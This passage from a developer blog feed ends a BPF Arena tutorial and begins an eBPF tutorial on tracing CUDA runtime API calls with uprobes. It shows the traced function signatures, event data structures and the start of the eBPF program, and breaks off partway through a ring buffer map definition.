&lt;p&gt;Choosing the right BPF map type depends on your access patterns and data structure needs. &lt;strong&gt;Use regular BPF maps&lt;/strong&gt; (hash, array, etc.) when you need simple key-value storage, small data structures that fit well in maps, standard map operations like atomic updates, or per-CPU statistics without complex linking. Maps excel at straightforward use cases with kernel-provided operations.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Use BPF Arena&lt;/strong&gt; when you need complex linked structures like lists, trees, or graphs, large shared memory exceeding typical map sizes, zero-copy userspace access to avoid syscall overhead, or custom memory management beyond what maps provide. Arena shines for sophisticated data structures where pointer operations are natural.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Use Ring Buffers&lt;/strong&gt; when you need one-way streaming from BPF to userspace, event logs or trace data, or sequentially processed data without random access. Ring buffers are optimized for high-throughput event streams but don't support bidirectional access or complex data structures.&lt;/p&gt;

&lt;p&gt;The arena vs maps trade-off fundamentally comes down to pointers and access patterns. If you find yourself encoding indices to simulate pointers in BPF maps, arena is probably the better choice. If you need large-scale data structures accessible from both kernel and userspace, arena's zero-copy shared memory model is hard to beat.&lt;/p&gt;

&lt;h2&gt;
  
  
  Summary and Next Steps
&lt;/h2&gt;

&lt;p&gt;BPF Arena solves a fundamental limitation of traditional BPF maps by providing sparse shared memory where you can use real C pointers to build complex data structures. Created by Alexei Starovoitov in 2024, arena enables linked lists, trees, graphs, and custom allocators using normal pointer operations instead of awkward integer indices. Both kernel BPF programs and userspace can map the same arena for zero-copy bidirectional access, eliminating syscall overhead.&lt;/p&gt;

&lt;p&gt;Our linked list example demonstrates the core arena concepts: defining an arena map, using &lt;code&gt;__arena&lt;/code&gt; annotations for pointer types, allocating memory with &lt;code&gt;bpf_alloc()&lt;/code&gt;, and accessing the same data structure from both kernel and userspace. The per-CPU page fragment allocator shows how BPF programs can implement sophisticated memory management in arena space. Arena unlocks new possibilities for in-kernel data structures, key-value store accelerators, and large-scale data aggregation up to 4GB.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;If you'd like to dive deeper into eBPF, check out our tutorial repository at &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial&lt;/a&gt; or visit our website at &lt;a href="https://eunomia.dev/tutorials/" rel="noopener noreferrer"&gt;https://eunomia.dev/tutorials/&lt;/a&gt;.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Original Arena Patches:&lt;/strong&gt; &lt;a href="https://lwn.net/Articles/961594/" rel="noopener noreferrer"&gt;https://lwn.net/Articles/961594/&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Meta's Arena Examples:&lt;/strong&gt; Linux kernel tree &lt;code&gt;samples/bpf/arena_*.c&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tutorial Repository:&lt;/strong&gt; &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/bpf_arena" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/bpf_arena&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Linux Kernel Source:&lt;/strong&gt; &lt;code&gt;kernel/bpf/arena.c&lt;/code&gt; - Arena implementation&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;LLVM Address Spaces:&lt;/strong&gt; Documentation on &lt;code&gt;__arena&lt;/code&gt; compiler support&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This example is adapted from Meta's arena_list.c in the Linux kernel samples, with educational enhancements. Requires Linux kernel 6.10+ with &lt;code&gt;CONFIG_BPF_ARENA=y&lt;/code&gt; enabled. Complete source code available in the tutorial repository.&lt;/p&gt;

</description>
      <category>ebpf</category>
      <category>arena</category>
      <category>memory</category>
    </item>
    <item>
      <title>eBPF Tutorial: Tracing CUDA GPU Operations</title>
      <dc:creator>云微</dc:creator>
      <pubDate>Tue, 30 Dec 2025 07:16:43 +0000</pubDate>
      <link>https://forem.com/yunwei37/ebpf-tutorial-tracing-cuda-gpu-operations-45eb</link>
      <guid>https://forem.com/yunwei37/ebpf-tutorial-tracing-cuda-gpu-operations-45eb</guid>
      <description>&lt;p&gt;Have you ever wondered what's happening under the hood when your CUDA application is running? GPU operations can be challenging to debug and profile because they happen in a separate device with its own memory space. In this tutorial, we'll build a powerful eBPF-based tracing tool that lets you peek into CUDA API calls in real time.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;The complete source code: &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/47-cuda-events" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/47-cuda-events&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Introduction to CUDA and GPU Tracing
&lt;/h2&gt;

&lt;p&gt;CUDA (Compute Unified Device Architecture) is NVIDIA's parallel computing platform and programming model that enables developers to use NVIDIA GPUs for general-purpose processing. When you run a CUDA application, a typical workflow begins with the host (CPU) allocating memory on the device (GPU), followed by data transfer from host memory to device memory, then GPU kernels (functions) are launched to process the data, after which results are transferred back from device to host, and finally device memory is freed.&lt;/p&gt;

&lt;p&gt;Each operation in this process involves CUDA API calls, such as &lt;code&gt;cudaMalloc&lt;/code&gt; for memory allocation, &lt;code&gt;cudaMemcpy&lt;/code&gt; for data transfer, and &lt;code&gt;cudaLaunchKernel&lt;/code&gt; for kernel execution. Tracing these calls can provide valuable insights for debugging and performance optimization, but this isn't straightforward. GPU operations are asynchronous, meaning the CPU can continue executing after submitting work to the GPU without waiting, and traditional debugging tools often can't penetrate this asynchronous boundary to access GPU internal state.&lt;/p&gt;

&lt;p&gt;This is where eBPF comes to the rescue! By using uprobes, we can intercept CUDA API calls in the user-space CUDA runtime library (&lt;code&gt;libcudart.so&lt;/code&gt;) before they reach the GPU driver, capturing critical information. This approach allows us to gain deep insights into memory allocation sizes and patterns, data transfer directions and volumes, kernel launch parameters, error codes and failure reasons returned by the API, and precise timing information for each operation. By intercepting these calls on the CPU side, we can build a complete view of an application's GPU usage behavior without modifying application code or relying on proprietary profiling tools.&lt;/p&gt;

&lt;p&gt;This tutorial primarily focuses on CPU-side CUDA API tracing, which provides a macro view of how applications interact with the GPU. However, CPU-side tracing alone has clear limitations. When a CUDA API function like &lt;code&gt;cudaLaunchKernel&lt;/code&gt; is called, it merely submits a work request to the GPU. We can see when the kernel was launched, but we cannot observe what actually happens inside the GPU. Critical details such as how thousands of threads access memory, their execution patterns, branching behavior, and synchronization operations remain invisible. These details are crucial for understanding performance bottlenecks, such as whether memory access patterns cause coalesced access failures or whether severe thread divergence reduces execution efficiency.&lt;/p&gt;

&lt;p&gt;To achieve fine-grained tracing of GPU operations, eBPF programs need to run directly on the GPU. This is exactly what the eGPU paper and &lt;a href="https://github.com/eunomia-bpf/bpftime/tree/master/example/gpu" rel="noopener noreferrer"&gt;bpftime GPU examples&lt;/a&gt; explore. bpftime converts eBPF programs into PTX instructions that GPUs can execute, then dynamically modifies CUDA binaries at runtime to inject these eBPF programs at kernel entry and exit points, enabling observation of GPU internal behavior. This approach allows developers to access GPU-specific information such as block indices, thread indices, global timers, and perform measurements and tracing on critical paths during kernel execution. This GPU-internal observability is essential for diagnosing complex performance issues, understanding kernel execution behavior, and optimizing GPU computation—capabilities that CPU-side tracing simply cannot provide.&lt;/p&gt;

&lt;h2&gt;
  
  
  Key CUDA Functions We Trace
&lt;/h2&gt;

&lt;p&gt;Our tracer monitors several critical CUDA functions that represent the main operations in GPU computing. Understanding these functions helps you interpret the tracing results and diagnose issues in your CUDA applications:&lt;/p&gt;

&lt;h3&gt;
  
  
  Memory Management
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;cudaMalloc&lt;/code&gt;&lt;/strong&gt;: Allocates memory on the GPU device. By tracing this, we can see how much memory is being requested, when, and whether it succeeds. Memory allocation failures are a common source of problems in CUDA applications.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;  &lt;span class="n"&gt;cudaError_t&lt;/span&gt; &lt;span class="nf"&gt;cudaMalloc&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="o"&gt;**&lt;/span&gt; &lt;span class="n"&gt;devPtr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;size&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;cudaFree&lt;/code&gt;&lt;/strong&gt;: Releases previously allocated memory on the GPU. Tracing this helps identify memory leaks (allocated memory that's never freed) and double-free errors.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;  &lt;span class="n"&gt;cudaError_t&lt;/span&gt; &lt;span class="nf"&gt;cudaFree&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;devPtr&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Data Transfer
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;cudaMemcpy&lt;/code&gt;&lt;/strong&gt;: Copies data between host (CPU) and device (GPU) memory, or between different locations in device memory. The direction parameter (&lt;code&gt;kind&lt;/code&gt;) tells us whether data is moving to the GPU, from the GPU, or within the GPU.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;  &lt;span class="n"&gt;cudaError_t&lt;/span&gt; &lt;span class="nf"&gt;cudaMemcpy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;dst&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;src&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;count&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cudaMemcpyKind&lt;/span&gt; &lt;span class="n"&gt;kind&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;kind&lt;/code&gt; parameter can be:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;cudaMemcpyHostToDevice&lt;/code&gt; (1): Copying from CPU to GPU&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;cudaMemcpyDeviceToHost&lt;/code&gt; (2): Copying from GPU to CPU&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;cudaMemcpyDeviceToDevice&lt;/code&gt; (3): Copying within GPU memory&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Kernel Execution
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;cudaLaunchKernel&lt;/code&gt;&lt;/strong&gt;: Launches a GPU kernel (function) to run on the device. This is where the actual parallel computation happens. Tracing this shows when kernels are launched and whether they succeed.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;  &lt;span class="n"&gt;cudaError_t&lt;/span&gt; &lt;span class="nf"&gt;cudaLaunchKernel&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;func&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;dim3&lt;/span&gt; &lt;span class="n"&gt;gridDim&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;dim3&lt;/span&gt; &lt;span class="n"&gt;blockDim&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; 
                              &lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="o"&gt;**&lt;/span&gt; &lt;span class="n"&gt;args&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;sharedMem&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cudaStream_t&lt;/span&gt; &lt;span class="n"&gt;stream&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Streams and Synchronization
&lt;/h3&gt;

&lt;p&gt;CUDA uses streams for managing concurrency and asynchronous operations:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;cudaStreamCreate&lt;/code&gt;&lt;/strong&gt;: Creates a new stream for executing operations in order but potentially concurrently with other streams.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;  &lt;span class="n"&gt;cudaError_t&lt;/span&gt; &lt;span class="nf"&gt;cudaStreamCreate&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cudaStream_t&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;pStream&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;cudaStreamSynchronize&lt;/code&gt;&lt;/strong&gt;: Waits for all operations in a stream to complete. This is a key synchronization point that can reveal performance bottlenecks.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;  &lt;span class="n"&gt;cudaError_t&lt;/span&gt; &lt;span class="nf"&gt;cudaStreamSynchronize&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cudaStream_t&lt;/span&gt; &lt;span class="n"&gt;stream&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Events
&lt;/h3&gt;

&lt;p&gt;CUDA events are used for timing and synchronization:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;cudaEventCreate&lt;/code&gt;&lt;/strong&gt;: Creates an event object for timing operations.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;  &lt;span class="n"&gt;cudaError_t&lt;/span&gt; &lt;span class="nf"&gt;cudaEventCreate&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cudaEvent_t&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;cudaEventRecord&lt;/code&gt;&lt;/strong&gt;: Records an event in a stream, which can be used for timing or synchronization.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;  &lt;span class="n"&gt;cudaError_t&lt;/span&gt; &lt;span class="nf"&gt;cudaEventRecord&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cudaEvent_t&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cudaStream_t&lt;/span&gt; &lt;span class="n"&gt;stream&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;cudaEventSynchronize&lt;/code&gt;&lt;/strong&gt;: Waits for an event to complete, which is another synchronization point.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;  &lt;span class="n"&gt;cudaError_t&lt;/span&gt; &lt;span class="nf"&gt;cudaEventSynchronize&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cudaEvent_t&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Device Management
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;cudaGetDevice&lt;/code&gt;&lt;/strong&gt;: Gets the current device being used.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;  &lt;span class="n"&gt;cudaError_t&lt;/span&gt; &lt;span class="nf"&gt;cudaGetDevice&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;device&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;cudaSetDevice&lt;/code&gt;&lt;/strong&gt;: Sets the device to be used for GPU executions.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;  &lt;span class="n"&gt;cudaError_t&lt;/span&gt; &lt;span class="nf"&gt;cudaSetDevice&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;device&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;By tracing these functions, we gain complete visibility into the lifecycle of GPU operations, from device selection and memory allocation to data transfer, kernel execution, and synchronization. This enables us to identify bottlenecks, diagnose errors, and understand the behavior of CUDA applications.&lt;/p&gt;

&lt;h2&gt;
  
  
  Architecture Overview
&lt;/h2&gt;

&lt;p&gt;Our CUDA events tracer consists of three main components:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Header File (&lt;code&gt;cuda_events.h&lt;/code&gt;)&lt;/strong&gt;: Defines data structures for communication between kernel and user space&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;eBPF Program (&lt;code&gt;cuda_events.bpf.c&lt;/code&gt;)&lt;/strong&gt;: Implements kernel-side hooks for CUDA functions using uprobes&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;User-Space Application (&lt;code&gt;cuda_events.c&lt;/code&gt;)&lt;/strong&gt;: Loads the eBPF program, processes events, and displays them to the user&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The tool uses eBPF uprobes to attach to CUDA API functions in the CUDA runtime library. When a CUDA function is called, the eBPF program captures the parameters and results, sending them to user space through a ring buffer.&lt;/p&gt;

&lt;h2&gt;
  
  
  Key Data Structures
&lt;/h2&gt;

&lt;p&gt;The central data structure for our tracer is the &lt;code&gt;struct event&lt;/code&gt; defined in &lt;code&gt;cuda_events.h&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="cm"&gt;/* Common fields */&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;                  &lt;span class="cm"&gt;/* Process ID */&lt;/span&gt;
    &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;comm&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;TASK_COMM_LEN&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt; &lt;span class="cm"&gt;/* Process name */&lt;/span&gt;
    &lt;span class="k"&gt;enum&lt;/span&gt; &lt;span class="n"&gt;cuda_event_type&lt;/span&gt; &lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;&lt;span class="cm"&gt;/* Type of CUDA event */&lt;/span&gt;

    &lt;span class="cm"&gt;/* Event-specific data (union to save space) */&lt;/span&gt;
    &lt;span class="k"&gt;union&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;size&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;mem&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;                 &lt;span class="cm"&gt;/* For malloc/memcpy */&lt;/span&gt;
        &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ptr&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;free_data&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;             &lt;span class="cm"&gt;/* For free */&lt;/span&gt;
        &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;size&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;kind&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;memcpy_data&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="cm"&gt;/* For memcpy */&lt;/span&gt;
        &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;func&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;launch&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;               &lt;span class="cm"&gt;/* For kernel launch */&lt;/span&gt;
        &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;device&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;device&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;               &lt;span class="cm"&gt;/* For device operations */&lt;/span&gt;
        &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;handle&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;handle&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;             &lt;span class="cm"&gt;/* For stream/event operations */&lt;/span&gt;
    &lt;span class="p"&gt;};&lt;/span&gt;

    &lt;span class="n"&gt;bool&lt;/span&gt; &lt;span class="n"&gt;is_return&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;           &lt;span class="cm"&gt;/* True if this is from a return probe */&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;ret_val&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;              &lt;span class="cm"&gt;/* Return value (for return probes) */&lt;/span&gt;
    &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;details&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;MAX_DETAILS_LEN&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt; &lt;span class="cm"&gt;/* Additional details as string */&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This structure is designed to efficiently capture information about different types of CUDA operations. The &lt;code&gt;union&lt;/code&gt; is a clever space-saving technique since each event only needs one type of data at a time. For example, a memory allocation event needs to store the size, while a free event needs to store a pointer.&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;cuda_event_type&lt;/code&gt; enum helps us categorize different CUDA operations:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="k"&gt;enum&lt;/span&gt; &lt;span class="n"&gt;cuda_event_type&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;CUDA_EVENT_MALLOC&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;CUDA_EVENT_FREE&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;CUDA_EVENT_MEMCPY&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;CUDA_EVENT_LAUNCH_KERNEL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;CUDA_EVENT_STREAM_CREATE&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;CUDA_EVENT_STREAM_SYNC&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;CUDA_EVENT_GET_DEVICE&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;CUDA_EVENT_SET_DEVICE&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;CUDA_EVENT_EVENT_CREATE&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;CUDA_EVENT_EVENT_RECORD&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;CUDA_EVENT_EVENT_SYNC&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This enum covers the main CUDA operations we want to trace, from memory management to kernel launches and synchronization.&lt;/p&gt;

&lt;h2&gt;
  
  
  The eBPF Program Implementation
&lt;/h2&gt;

&lt;p&gt;Let's dive into the eBPF program (&lt;code&gt;cuda_events.bpf.c&lt;/code&gt;) that hooks into CUDA functions. The full code is available in the repository, but here are the key parts:&lt;/p&gt;

&lt;p&gt;First, we create a ring buffer to communicate with user space:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_MAP_TYPE_RINGBUF&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_entries&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;256&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mi"&gt;1024&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
